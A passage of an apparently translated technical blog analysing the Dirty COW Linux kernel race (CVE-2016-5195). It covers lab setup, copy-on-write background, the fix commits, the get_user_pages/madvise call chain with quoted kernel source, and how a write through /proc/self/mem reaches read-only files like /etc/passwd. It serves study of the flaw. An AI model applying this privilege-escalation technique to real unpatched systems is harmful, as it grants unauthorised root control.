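Preface

Dirty COW (CVE-2016-5195) is a race-condition privilege-escalation vulnerability in the Linux kernel. The Alibaba Cloud security team has already published a report on the Xianzhi (先知) platform, "Dirty COW Vulnerability Analysis Report [CVE-2016-5195]". Here I add detail on the function call chain and on some finer points of the bug. This is my first analysis of a Linux kernel CVE and I am not yet familiar with many kernel mechanisms, so corrections are very welcome.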

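Environment Setup

To reproduce the vulnerability I used a fairly classic PoC (code link). The kernel is linux-4.4.0-31, taken from the official Ubuntu package archive, which ships a prebuilt compressed kernel image that can be booted directly with QEMU.

The root filesystem is generated with BusyBox. You can build one yourself by following "Debug Linux Kernel With QEMU/KVM", or reuse a filesystem from any kernel pwn challenge found online.

BusyBox bundles common Linux commands and tools into a single binary. Reproducing this vulnerability requires the su command. The busybox binary that provides su must be owned by root:root and have the SUID bit set, so that commands run through BusyBox execute with root's identity and can perform privileged operations. The textbook use of this bit is passwd: an ordinary user has no permission to modify /etc/shadow, but because passwd is SUID root, the user can still write their own new password. So after building BusyBox, set its owner and SUID bit with the commands below; otherwise su will not have enough privilege inside QEMU. In addition, when BusyBox is built by an ordinary user, /etc/passwd is owned by that user and can be edited inside QEMU, so set its owner and group to root as well.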

sudo chown root:root ./bin/busybox

sudo chmod u+s ./bin/busybox
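Whether the SUID bit actually took effect can be checked from the file's mode bits with stat(2). The helper below is a minimal sketch; the name has_setuid_bit is made up for this illustration and is not part of BusyBox or the PoC.

```c
#include <assert.h>
#include <sys/stat.h>

/*
 * Hypothetical helper (not from the article): returns 1 if `path` has the
 * set-user-ID bit set, 0 if it does not, and -1 if stat() fails.
 */
int has_setuid_bit(const char *path)
{
    struct stat st;

    assert(path);
    if (stat(path, &st) != 0)
        return -1;
    /* S_ISUID is the mode bit that `chmod u+s` turns on. */
    return (st.st_mode & S_ISUID) ? 1 : 0;
}
```

Called on ./bin/busybox after the two commands above, it should return 1 if the bit was set.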

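Reproducing the Vulnerability

Compile the exploit statically and pack the filesystem. (Linking with -lpthread requires copying libc into the filesystem, whereas -pthread does not; for the difference between the two options see the article "编译参数中-pthread以及-lpthread的区别", on the difference between the -pthread and -lpthread compiler options.)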

╭─wz@wz-virtual-machine ~/Desktop/DirtyCow/vul_env/files ‹hexo*›

╰─$ ldd ./dirty

linux-vdso.so.1 => (0x00007ffea5f58000)

libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fc988780000)

libcrypt.so.1 => /lib/x86_64-linux-gnu/libcrypt.so.1 (0x00007fc988548000)

libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fc98817e000)

/lib64/ld-linux-x86-64.so.2 (0x00007fc98899d000)

─wz@wz-virtual-machine ~/Desktop/DirtyCow/vul_env/files ‹hexo*›

╰─$ gcc ./dirty.c -static -o dirty -lpthread -lcrypt

╭─wz@wz-virtual-machine ~/Desktop/DirtyCow/vul_env ‹hexo*›

╰─$ cp /lib/x86_64-linux-gnu/libpthread.so.0 ./files/lib/ && cp /lib/x86_64-linux-gnu/libcrypt.so.1 ./files/lib/

─wz@wz-virtual-machine ~/Desktop/DirtyCow/vul_env/files ‹hexo*›

╰─$ find . -print0 | cpio --null -ov --format=newc > ../rootfs.cpio

The launch script is as follows:

qemu-system-x86_64 \
    -m 256M \
    -kernel ./vmlinuz-4.4.0-31-generic \
    -initrd ./rootfs.cpio \
    -append "cores=2,threads=1 root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
    -s \
    -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
    -nographic

Inside QEMU, run the compiled exploit named dirty and set a password for the new user. Then su xmzyshypnc switches to that user, whose uid has been changed to 0. /etc/passwd, a privileged file originally owned by root, now shows xmzyshypnc as its owner, so we can read and write it.

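Background

Copy-on-Write

Copy-on-write (COW) is a technique Linux uses when creating processes. When a program forks, the kernel only sets up the child's virtual address space structures, and that address space mirrors the corresponding segments of the parent. In other words, the child's segments and the parent's point to the same physical memory, and physical memory is allocated for the child's segments only when the parent or child does something that changes a segment's contents (exec, for example).

More concretely, if the parent or child modifies a segment but does not call exec, physical memory is allocated only for the child's stack segment, and the child's code segment still maps to the same physical memory as the parent's. If exec is called, the child's code segment also gets its own physical memory and becomes independent of the parent. (Note: exec here is not a single function but the name of a family of functions, including execl(), execlp(), execv(), and execvp().)

The benefit of copy-on-write is that memory copying is delayed, or avoided altogether, until the parent or child is about to write to a page. A traditional fork copies the process data to the child at creation time. Very often, though, the child implements its own functionality and calls exec to replace the original image, in which case the data just copied is thrown away again, which is inefficient. With COW, creating a new process only copies the parent's page tables for the child and does not touch physical memory. After exec, physical memory is allocated for the child's .text/.data/heap/stack segments. Without exec and without any modification, the memory is effectively shared read-only. Without exec but with modifications, the child shares the code segment with the parent, and physical memory is allocated for the data and stack segments.

For the implementation, see the article "Copy On Write机制了解一下". The basic idea is to mark the shared pages read-only. As soon as the parent or child tries to change a page, a page fault is raised and only the faulting page is copied (the remaining pages stay shared with the parent).

In CTF competitions this has appeared as brute-forcing the canary through forked children: the child starts from the same memory contents as the parent, so parent and child have the same canary.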
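The visible effect of these fork semantics can be sketched in a few lines of C. COW itself is transparent to the program; what the sketch shows is only the result that a child's write lands in the child's own copy of the page. The function and variable names are invented for the illustration.

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

static int shared_value = 42;   /* lives in .data, shared until someone writes */

/*
 * Forks a child that overwrites shared_value and exits.
 * Returns the value the parent sees afterwards, or -1 on error.
 */
int parent_value_after_child_write(void)
{
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Write fault in the child: the kernel copies this page for it. */
        shared_value = 1337;
        _exit(shared_value == 1337 ? 0 : 1);
    }

    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    assert(WIFEXITED(status) && WEXITSTATUS(status) == 0);

    /* The parent still reads its own, unmodified page. */
    return shared_value;
}
```

The parent keeps seeing its original value, because the child's write was redirected to a private copy of the page.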

Page Fault Handling





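For this part I read Chapter 9 of Understanding the Linux Kernel. The overall flow of page fault exception handling is shown in the figures in this section; the main thing to watch is the conditions for COW. When a page fault occurs, the handler first has to distinguish a programming error from a genuinely missing page. For a missing page, it then checks whether the faulting linear address is valid. Because of demand paging and copy-on-write, a newly requested page is assumed not to be used at first, so what is handed out is the zero page, a page filled entirely with zeros. The zero page does not have to be allocated and filled each time: an existing one is reused and marked non-writable. The first write to such a page triggers a page fault, which in turn activates copy-on-write.

Other Background Used

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); creates a memory mapping; its arguments specify the start address, the size, the protection, and so on. In CTF challenges we rarely need the flags argument. Its meaning is given below (from the manual page). When MAP_PRIVATE is set, writes to the mapping go through COW: the flag creates a private copy-on-write mapping, so writes to the region do not affect the underlying file. If another process is using the file, changes this process makes in the region affect only the COWed pages and not the file.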
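The routing decision made by the fault handler can be modeled in user space. The sketch below follows the branch order of handle_pte_fault and do_fault as quoted later in this article and leaves out the NUMA and huge-page paths. The struct, enum, and function names are invented for the illustration and are not kernel APIs.

```c
#include <assert.h>
#include <stdbool.h>

/* Simplified model of one page table entry plus one fault request. */
struct fault_model {
    bool pte_none;        /* no entry installed yet */
    bool pte_present;     /* entry points at a page in memory */
    bool pte_write;       /* entry is writable */
    bool write_access;    /* FAULT_FLAG_WRITE in the kernel */
    bool vma_anonymous;   /* mapping is not backed by a file */
    bool vma_shared;      /* VM_SHARED in the kernel */
};

enum fault_handler {
    HANDLER_NONE,         /* only accessed/dirty bits need updating */
    DO_ANONYMOUS_PAGE,
    DO_READ_FAULT,
    DO_COW_FAULT,
    DO_SHARED_FAULT,
    DO_SWAP_PAGE,
    DO_WP_PAGE
};

/* Returns the kernel handler this fault would be routed to in the model. */
enum fault_handler fault_handler_for(const struct fault_model *f)
{
    assert(f);
    if (f->pte_none) {
        if (f->vma_anonymous)
            return DO_ANONYMOUS_PAGE;
        if (!f->write_access)
            return DO_READ_FAULT;
        return f->vma_shared ? DO_SHARED_FAULT : DO_COW_FAULT;
    }
    if (!f->pte_present)
        return DO_SWAP_PAGE;
    if (f->write_access && !f->pte_write)
        return DO_WP_PAGE;
    return HANDLER_NONE;
}
```

A write fault on an empty entry of a private file mapping goes to DO_COW_FAULT, a write fault on a present read-only entry goes to DO_WP_PAGE, and a read fault on an empty entry goes to DO_READ_FAULT. These are the three cases that matter for the analysis later on.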

The flags argument determines whether updates to the mapping are

visible to other processes mapping the same region, and whether

updates are carried through to the underlying file. This behavior is

determined by including exactly one of the following values in flags:

MAP_PRIVATE

Create a private copy-on-write mapping. Updates to the

mapping are not visible to other processes mapping the same

file, and are not carried through to the underlying file. It

is unspecified whether changes made to the file after the

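mmap() call are visible in the mapped region.

int madvise(void *addr, size_t length, int advice); tells the kernel how the process expects to use the mapped or shared memory in the range [addr, addr+length), so that the kernel can handle it appropriately. MADV_DONTNEED says the range will not be used in the near future, so the kernel may free it.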

Conventional advice values

The advice values listed below allow an application to tell the

kernel how it expects to use some mapped or shared memory areas, so

that the kernel can choose appropriate read-ahead and caching

techniques. These advice values do not influence the semantics of

the application (except in the case of MADV_DONTNEED), but may

influence its performance. All of the advice values listed here have

analogs in the POSIX-specified posix_madvise(3) function, and the

values have the same meanings, with the exception of MADV_DONTNEED.

MADV_DONTNEED

Do not expect access in the near future. (For the time being,

the application is finished with the given range, so the

kernel can free resources associated with it.)

After a successful MADV_DONTNEED operation, the semantics of

memory access in the specified region are changed: subsequent

accesses of pages in the range will succeed, but will result

in either repopulating the memory contents from the up-to-date

contents of the underlying mapped file (for shared file

mappings, shared anonymous mappings, and shmem-based

techniques such as System V shared memory segments) or zero-

fill-on-demand pages for anonymous private mappings.

Note that, when applied to shared mappings, MADV_DONTNEED

might not lead to immediate freeing of the pages in the range.

The kernel is free to delay freeing the pages until an

appropriate moment. The resident set size (RSS) of the

calling process will be immediately reduced however.

MADV_DONTNEED cannot be applied to locked pages, Huge TLB

pages, or VM_PFNMAP pages. (Pages marked with the kernel-

internal VM_PFNMAP flag are special memory areas that are not

managed by the virtual memory subsystem. Such pages are

typically created by device drivers that map the pages into

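user space.)

Dirty bit: in Linux, when the processor writes to or modifies a page of memory, that page is marked dirty. The flag tells the kernel that the contents in memory have been modified but not yet written back to disk. See the articles "dirty bit" and "脏页 (dirty page)".

CVE-2016-5195 Vulnerability Analysis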
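The MAP_PRIVATE and MADV_DONTNEED behavior quoted from the manual pages above can be observed directly. The following is a minimal sketch, assuming a writable /tmp; the function name and the temporary file name template are made up for the illustration.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Maps a temporary file with MAP_PRIVATE, writes to the mapping, then drops
 * the private copy with MADV_DONTNEED.
 *   out[0]: byte seen in the mapping after the write
 *   out[1]: byte in the file after the write
 *   out[2]: byte seen in the mapping after MADV_DONTNEED
 * Returns 0 on success, -1 on any failure.
 */
int private_mapping_demo(char out[3])
{
    char path[] = "/tmp/cow_demo_XXXXXX";
    long page = sysconf(_SC_PAGESIZE);
    char *map = MAP_FAILED;
    int rc = -1;

    assert(out);
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);                        /* the file lives until fd is closed */

    if (write(fd, "A", 1) != 1 || ftruncate(fd, page) != 0)
        goto done;
    map = mmap(NULL, page, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED)
        goto done;

    map[0] = 'B';                        /* write fault: private copy is made */
    out[0] = map[0];
    if (pread(fd, &out[1], 1, 0) != 1)   /* the file itself is untouched */
        goto done;

    if (madvise(map, page, MADV_DONTNEED) != 0)
        goto done;
    out[2] = map[0];                     /* copy dropped: re-read from the file */
    rc = 0;
done:
    if (map != MAP_FAILED)
        munmap(map, page);
    close(fd);
    return rc;
}
```

After MADV_DONTNEED the private copy is gone and the next access is served from the file again. This is exactly the property the exploit relies on to make the kernel forget the COWed page.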

commit

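First, let us look at the commits related to the bug. Linus noticed the problem as early as 2005, but the fix at the time was inadequate, and later developments made the problem more prominent. Only a new commit in 2016 formally fixed it (and as it turned out, that fix was still incomplete: Huge Dirty COW was waiting for Linus further down the road).

From the commit messages alone we can roughly tell that the problem lies around handle_mm_fault, the function responsible for allocating a new page frame.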

commit 4ceb5db9757aaeadcf8fbbf97d76bd42aa4df0d6

Author: Linus Torvalds

Date: Mon Aug 1 11:14:49 2005 -0700

Fix get_user_pages() race for write access

There's no real guarantee that handle_mm_fault() will always be able to

break a COW situation - if an update from another thread ends up

modifying the page table some way, handle_mm_fault() may end up

requiring us to re-try the operation.

That's normally fine, but get_user_pages() ended up re-trying it as a

read, and thus a write access could in theory end up losing the dirty

bit or be done on a page that had not been properly COW'ed.

This makes get_user_pages() always retry write accesses as write

accesses by making "follow_page()" require that a writable follow has

the dirty bit set. That simplifies the code and solves the race: if the

COW break fails for some reason, we'll just loop around and try again.

commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619

Author: Linus Torvalds

Date: Thu Oct 13 20:07:36 2016 GMT

This is an ancient bug that was actually attempted to be fixed once

(badly) by me eleven years ago in commit 4ceb5db9757a ("Fix

get_user_pages() race for write access") but that was then undone due to

problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").

In the meantime, the s390 situation has long been fixed, and we can now

fix it by checking the pte_dirty() bit properly (and do it better). The

s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement

software dirty bits") which made it into v3.9. Earlier kernels will

have to look at the page state itself.

Also, the VM has become more scalable, and what used a purely

theoretical race back then has become easier to trigger.

To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,

we already did a COW" rather than play racy games with FOLL_WRITE that

is very fundamental, and then use the pte dirty flag to validate that

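the FOLL_COW flag is still valid.

How the Vulnerability Is Triggered

The call chain is quite complex, so let us first get a rough picture of how the bug is triggered.

Our goal is to modify a read-only file, which lets us change privileged files that only root can write, such as /etc/passwd.

The bug arises in the following scenario. We use the write system call to write to /proc/self/mem, and the kernel calls get_user_pages, which finds the physical page behind a virtual address. Internally it calls follow_page_mask to find the page descriptor (from the kernel comment: "follow_page_mask - look up a page descriptor from a user-virtual address").

The first lookup of the page table entry fails because the page is missing (demand paging). get_user_pages calls faultin_page, which calls handle_mm_fault to obtain a page frame and install the mapping in the page table. The second follow_page_mask lookup also fails, because the entry it finds points to a read-only mapping while the lookup still asks for write access. faultin_page runs again, finds that COW has already been done, and clears FOLL_WRITE. When get_user_pages calls follow_page_mask the third time, it therefore no longer requires the mapping to be writable, so the lookup succeeds, and the kernel can then force the write into the read-only memory.

This behavior is fine in itself: writes through /proc/self/mem are meant to ignore page permissions. For such a write:

If the memory is a shared mapping (VM_SHARED), mmap can only have created it (with write permission) if the process has write permission on the file, so the write is not a privilege violation.

If the memory is a private mapping (MAP_PRIVATE), COW creates a writable copy for the write, and none of the updates reach the original file.

However, suppose that after the second failure above, once FOLL_WRITE has been cleared, another thread calls madvise(addr, len, MADV_DONTNEED), where [addr, addr+len) is a read-only MAP_PRIVATE mapping of a read-only file. The page table entry of the mapping then becomes empty. When follow_page_mask is called the third time to look up the entry, the earlier COW page frame is no longer used (the entry is empty). The kernel goes straight to the original read-only page instead, and because write access is no longer required, no new COW happens. Writing directly to that physical page modifies the read-only file.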
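The "writes through /proc/self/mem ignore page permissions" behavior can be tried on a harmless target: a read-only, private, anonymous page of the calling process. This is a minimal sketch with an invented function name. It assumes /proc is mounted and that the running kernel permits forced writes through /proc/self/mem; some hardened configurations refuse them, in which case the function returns -1.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Writes one byte into a PROT_READ, MAP_PRIVATE anonymous page through
 * /proc/self/mem and returns the byte read back from the mapping.
 * Returns -1 if /proc/self/mem is unavailable or the write is refused.
 */
int write_readonly_page_via_proc_mem(char value)
{
    long page = sysconf(_SC_PAGESIZE);
    int result = -1;

    assert(page > 0);
    char *map = mmap(NULL, page, PROT_READ,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map == MAP_FAILED)
        return -1;

    int fd = open("/proc/self/mem", O_RDWR);
    if (fd >= 0) {
        /* For this file, the offset is the virtual address to access. */
        if (pwrite(fd, &value, 1, (off_t)(uintptr_t)map) == 1)
            result = (unsigned char)map[0];
        close(fd);
    }
    munmap(map, page);
    return result;
}
```

A direct store to map[0] would raise SIGSEGV, while the write through /proc/self/mem succeeds where forced writes are allowed, because the kernel services it with a COW copy of the page.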
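The retry logic described above can be reduced to a small user-space state machine. The sketch below is a toy model, not kernel code: the page table entry is a three-valued enum, madvise is modeled as resetting the entry, and all names are invented. The patched variant follows the idea stated in the 2016 commit message quoted earlier (keep FOLL_WRITE, record the COW in a separate FOLL_COW flag, and validate it against the dirty entry); the FOLL_FORCE condition is left out for brevity.

```c
#include <assert.h>
#include <stdbool.h>

#define FOLL_WRITE 0x1u
#define FOLL_COW   0x2u   /* only set by the patched model */

enum pte_state { PTE_NONE, PTE_COW_RO_DIRTY, PTE_FILE_RO };
enum page_kind { PAGE_NULL, PAGE_PRIVATE_COPY, PAGE_FILE_CACHE };

struct model {
    enum pte_state pte;
    unsigned int flags;
    bool patched;          /* true: emulate the FOLL_COW fix */
};

/* Lookup step: which page, if any, may be handed to the writer? */
static enum page_kind follow_page(const struct model *m)
{
    if (m->pte == PTE_NONE)
        return PAGE_NULL;
    bool cow_done = (m->flags & FOLL_COW) && m->pte == PTE_COW_RO_DIRTY;
    if ((m->flags & FOLL_WRITE) && !cow_done)
        return PAGE_NULL;                  /* ask for another fault */
    return m->pte == PTE_COW_RO_DIRTY ? PAGE_PRIVATE_COPY : PAGE_FILE_CACHE;
}

/* Fault step: install an entry, or record that COW has been broken. */
static void faultin_page(struct model *m)
{
    if (m->pte == PTE_NONE) {
        /* do_cow_fault for a write request, do_read_fault otherwise */
        m->pte = (m->flags & FOLL_WRITE) ? PTE_COW_RO_DIRTY : PTE_FILE_RO;
        return;
    }
    /* Present but not writable: do_wp_page breaks COW. */
    m->pte = PTE_COW_RO_DIRTY;
    if (m->patched)
        m->flags |= FOLL_COW;      /* fix: remember that COW was done */
    else
        m->flags &= ~FOLL_WRITE;   /* vulnerable: retry as a plain read */
}

/*
 * Runs the retry loop for a forced write. If race_round is r > 0, the
 * modeled madvise clears the entry right before the r-th lookup (1-based).
 */
enum page_kind get_page_for_write(bool patched, int race_round)
{
    struct model m = { PTE_NONE, FOLL_WRITE, patched };

    assert(race_round >= 0);
    for (int round = 1; round <= 16; round++) {
        if (round == race_round)
            m.pte = PTE_NONE;              /* madvise(MADV_DONTNEED) */
        enum page_kind page = follow_page(&m);
        if (page != PAGE_NULL)
            return page;
        faultin_page(&m);
    }
    return PAGE_NULL;
}
```

In this model, get_page_for_write(false, 3) ends on the file's page-cache page, which is the bug, while the same interleaving with patched set to true still ends on the private copy.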

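Basic Call Chain of the Vulnerable Path

I originally wanted to list every function involved, but there turned out to be too many. So I will first go through the call flow briefly; readers who want the details can then look at the individual function implementations.

The first demand-paging fault finds the pte empty, so do_fault is called to dispatch the various fault cases. The page we request is read-only and we want to write to it, so the fault goes through do_cow_fault, which uses COW to create a new page, sets up the memory-to-page-frame mapping, and updates the pte in the page table. alloc_set_pte installs the entry, marked dirty/present/read-only. The fault returns 0 and the lookup is retried.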

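faultin_page
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
        do_fault <- pte is not present
          do_cow_fault <- FAULT_FLAG_WRITE
            alloc_set_pte
              maybe_mkwrite(pte_mkdirty(entry), vma) <- mark the page dirty
                                                        but keep it RO

# Returns with 0 and retry
follow_page_mask
  follow_page_pte
    (flags & FOLL_WRITE) && !pte_write(pte) <- retry fault

In the second fault, the pte checks pass. The handler then checks FAULT_FLAG_WRITE and pte_write to determine whether we want to write the page and whether the page is writable, and enters do_wp_page for copy-on-write handling. (Note that the first fault was COW with no page table entry in place; this one is COW with the pte entry already established.) The checks show that COW has already been performed (when the earlier COW finished, the page was only marked dirty and not writable, which is why this check is still needed). Since the page is already COWed, it is simply reused. (The checks also look at the page's reference count: if the count is 1, only this process uses the page, so it can be used directly.) The final return value is VM_FAULT_WRITE, which signals that COW has been broken, so FOLL_WRITE is cleared. That flag means we want to write to the page; from this point on the request is treated as a read-only request for the page. The fault returns 0 and the lookup is retried.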

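faultin_page
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
        FAULT_FLAG_WRITE && !pte_write
          do_wp_page
            PageAnon() <- this is CoWed page already
            reuse_swap_page <- page is exclusively ours
            wp_page_reuse
              maybe_mkwrite <- dirty but RO again
              ret = VM_FAULT_WRITE
((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) <- we drop FOLL_WRITE

# Returns with 0 and retry as a read fault

At this point a new thread calls madvise, which tears down the mapping of the page table entry and leaves the corresponding slot in the page table empty.

The third lookup fails because the page table entry is empty, so fault handling runs again. It finds the pte empty, and FAULT_FLAG_WRITE is no longer set because we no longer ask for write access. do_read_fault, the function that serves read-only page requests, is therefore called directly. In it, __do_fault reads the file content into fault_page, which is then returned to the caller. This is how we end up writing to a read-only privileged file.

In summary, the core of the bug is using madvise to tear down the mapping and clear the page table entry. After the COW path has cleared FOLL_WRITE, the write no longer goes to the private COW page; the kernel finds the original file-backed page instead and allows it to be written.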

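cond_resched -> different thread will now unmap via madvise
follow_page_mask
  !pte_present && pte_none
faultin_page
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
        do_fault <- pte is not present
          do_read_fault <- this is a read fault and we will get pagecache
                           page!

Function Call Analysis

The four rounds of page fault handling above involve many functions. I have added comments at the important calls and branches. I did not expect this many calls at first, so this part is long; read it alongside the explanation above and focus on the key call sites.

get_user_pages is a wrapper around __get_user_pages_locked, which in turn calls __get_user_pages.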

long get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages, int write,
		int force, struct page **pages, struct vm_area_struct **vmas)
{
	return __get_user_pages_locked(tsk, mm, start, nr_pages, write, force,
				       pages, vmas, NULL, false, FOLL_TOUCH);
}
EXPORT_SYMBOL(get_user_pages);
//
static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
						struct mm_struct *mm,
						unsigned long start,
						unsigned long nr_pages,
						int write, int force,
						struct page **pages,
						struct vm_area_struct **vmas,
						int *locked, bool notify_drop,
						unsigned int flags)
{
	long ret, pages_done;
	bool lock_dropped;

	if (locked) {
		/* if VM_FAULT_RETRY can be returned, vmas become invalid */
		BUG_ON(vmas);
		/* check caller initialized locked */
		BUG_ON(*locked != 1);
	}

	if (pages)
		flags |= FOLL_GET;
	if (write)
		flags |= FOLL_WRITE;
	if (force)
		flags |= FOLL_FORCE;

	pages_done = 0;
	lock_dropped = false;
	for (;;) {
		ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
				       vmas, locked);// the call we follow
		if (!locked)
			/* VM_FAULT_RETRY couldn't trigger, bypass */
			return ret;

		/* VM_FAULT_RETRY cannot return errors */
		if (!*locked) {
			BUG_ON(ret < 0);
			BUG_ON(ret >= nr_pages);
		}

		if (!pages)
			/* If it's a prefault don't insist harder */
			return ret;

		if (ret > 0) {
			nr_pages -= ret;
			pages_done += ret;
			if (!nr_pages)
				break;
		}
		if (*locked) {
			/* VM_FAULT_RETRY didn't trigger */
			if (!pages_done)
				pages_done = ret;
			break;
		}
		/* VM_FAULT_RETRY triggered, so seek to the faulting offset */
		pages += ret;
		start += ret << PAGE_SHIFT;

		/*
		 * Repeat on the address that fired VM_FAULT_RETRY
		 * without FAULT_FLAG_ALLOW_RETRY but with
		 * FAULT_FLAG_TRIED.
		 */
		*locked = 1;
		lock_dropped = true;
		down_read(&mm->mmap_sem);
		ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
				       pages, NULL, NULL);
		if (ret != 1) {
			BUG_ON(ret > 1);
			if (!pages_done)
				pages_done = ret;
			break;
		}
		nr_pages--;
		pages_done++;
		if (!nr_pages)
			break;
		pages++;
		start += PAGE_SIZE;
	}
	if (notify_drop && lock_dropped && *locked) {
		/*
		 * We must let the caller know we temporarily dropped the lock
		 * and so the critical section protected by it was lost.
		 */
		up_read(&mm->mmap_sem);
		*locked = 0;
	}
	return pages_done;
}
//
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas, int *nonblocking)
{
	long i = 0;
	unsigned int page_mask;
	struct vm_area_struct *vma = NULL;

	if (!nr_pages)
		return 0;

	VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

	/*
	 * If FOLL_FORCE is set then do not force a full fault as the hinting
	 * fault information is unrelated to the reference behaviour of a task
	 * using the address space
	 */
	if (!(gup_flags & FOLL_FORCE))
		gup_flags |= FOLL_NUMA;

	do {
		struct page *page;
		unsigned int foll_flags = gup_flags;
		unsigned int page_increm;

		/* first iteration or cross vma bound */
		if (!vma || start >= vma->vm_end) {
			vma = find_extend_vma(mm, start);
			if (!vma && in_gate_area(mm, start)) {
				int ret;
				ret = get_gate_page(mm, start & PAGE_MASK,
						gup_flags, &vma,
						pages ? &pages[i] : NULL);
				if (ret)
					return i ? : ret;
				page_mask = 0;
				goto next_page;
			}

			if (!vma || check_vma_flags(vma, gup_flags))
				return i ? : -EFAULT;
			if (is_vm_hugetlb_page(vma)) {
				i = follow_hugetlb_page(mm, vma, pages, vmas,
						&start, &nr_pages, i,
						gup_flags);
				continue;
			}
		}
retry:
		/*
		 * If we have a pending SIGKILL, don't keep faulting pages and
		 * potentially allocating memory.
		 */
		if (unlikely(fatal_signal_pending(current)))
			return i ?
				i : -ERESTARTSYS;
		cond_resched();
		page = follow_page_mask(vma, start, foll_flags, &page_mask);// look up the page descriptor
		if (!page) {
			int ret;
			ret = faultin_page(tsk, vma, start, &foll_flags,
					nonblocking);// handle the page fault
			switch (ret) {
			case 0:
				goto retry;// the lookup failed, so retry fetching the page table entry
			case -EFAULT:
			case -ENOMEM:
			case -EHWPOISON:
				return i ? i : ret;
			case -EBUSY:
				return i;
			case -ENOENT:
				goto next_page;
			}
			BUG();
		} else if (PTR_ERR(page) == -EEXIST) {
			/*
			 * Proper page table entry exists, but no corresponding
			 * struct page.
			 */
			goto next_page;
		} else if (IS_ERR(page)) {
			return i ? i : PTR_ERR(page);
		}
		if (pages) {
			pages[i] = page;
			flush_anon_page(vma, page, start);
			flush_dcache_page(page);
			page_mask = 0;
		}
next_page:
		if (vmas) {
			vmas[i] = vma;
			page_mask = 0;
		}
		page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
		if (page_increm > nr_pages)
			page_increm = nr_pages;
		i += page_increm;
		start += page_increm * PAGE_SIZE;
		nr_pages -= page_increm;
	} while (nr_pages);
	return i;
}
//
struct page *follow_page_mask(struct vm_area_struct *vma,
			      unsigned long address, unsigned int flags,
			      unsigned int *page_mask)
{
	pgd_t *pgd;// page global directory
	pud_t *pud;// page upper directory
	pmd_t *pmd;// page middle directory
	spinlock_t *ptl;// page table lock
	struct page *page;// page descriptor
	struct mm_struct *mm = vma->vm_mm;// the process memory descriptor, taken from the VMA

	*page_mask = 0;

	page = follow_huge_addr(mm, address, flags & FOLL_WRITE);
	if (!IS_ERR(page)) {
		BUG_ON(flags & FOLL_GET);
		return page;
	}

	pgd = pgd_offset(mm, address);
	if (pgd_none(*pgd) || unlikely(pgd_bad(*pgd)))
		return no_page_table(vma, flags);

	pud = pud_offset(pgd, address);
	if (pud_none(*pud))
		return no_page_table(vma, flags);
	if (pud_huge(*pud) && vma->vm_flags & VM_HUGETLB) {
		page = follow_huge_pud(mm, address, pud, flags);
		if (page)
			return page;
		return no_page_table(vma, flags);
	}
	if (unlikely(pud_bad(*pud)))
		return no_page_table(vma, flags);

	pmd = pmd_offset(pud, address);
	if (pmd_none(*pmd))
		return no_page_table(vma, flags);
	if (pmd_huge(*pmd) && vma->vm_flags & VM_HUGETLB) {
		page = follow_huge_pmd(mm, address, pmd, flags);
		if (page)
			return
				page;
		return no_page_table(vma, flags);
	}
	if ((flags & FOLL_NUMA) && pmd_protnone(*pmd))
		return no_page_table(vma, flags);
	if (pmd_trans_huge(*pmd)) {
		if (flags & FOLL_SPLIT) {
			split_huge_page_pmd(vma, address, pmd);
			return follow_page_pte(vma, address, pmd, flags);
		}
		ptl = pmd_lock(mm, pmd);
		if (likely(pmd_trans_huge(*pmd))) {
			if (unlikely(pmd_trans_splitting(*pmd))) {
				spin_unlock(ptl);
				wait_split_huge_page(vma->anon_vma, pmd);
			} else {
				page = follow_trans_huge_pmd(vma, address,
							     pmd, flags);
				spin_unlock(ptl);
				*page_mask = HPAGE_PMD_NR - 1;
				return page;
			}
		} else
			spin_unlock(ptl);
	}
	return follow_page_pte(vma, address, pmd, flags);// go to the page table to find the entry
}
// look up the page table entry
static struct page *follow_page_pte(struct vm_area_struct *vma,
		unsigned long address, pmd_t *pmd, unsigned int flags)
{
	struct mm_struct *mm = vma->vm_mm;
	struct page *page;
	spinlock_t *ptl;
	pte_t *ptep, pte;

retry:
	if (unlikely(pmd_bad(*pmd)))
		return no_page_table(vma, flags);

	ptep = pte_offset_map_lock(mm, pmd, address, &ptl);
	pte = *ptep;
	if (!pte_present(pte)) {
		swp_entry_t entry;
		/*
		 * KSM's break_ksm() relies upon recognizing a ksm page
		 * even while it is being migrated, so for that case we
		 * need migration_entry_wait().
		 */
		if (likely(!(flags & FOLL_MIGRATION)))
			goto no_page;
		if (pte_none(pte))
			goto no_page;
		entry = pte_to_swp_entry(pte);
		if (!is_migration_entry(entry))
			goto no_page;
		pte_unmap_unlock(ptep, ptl);
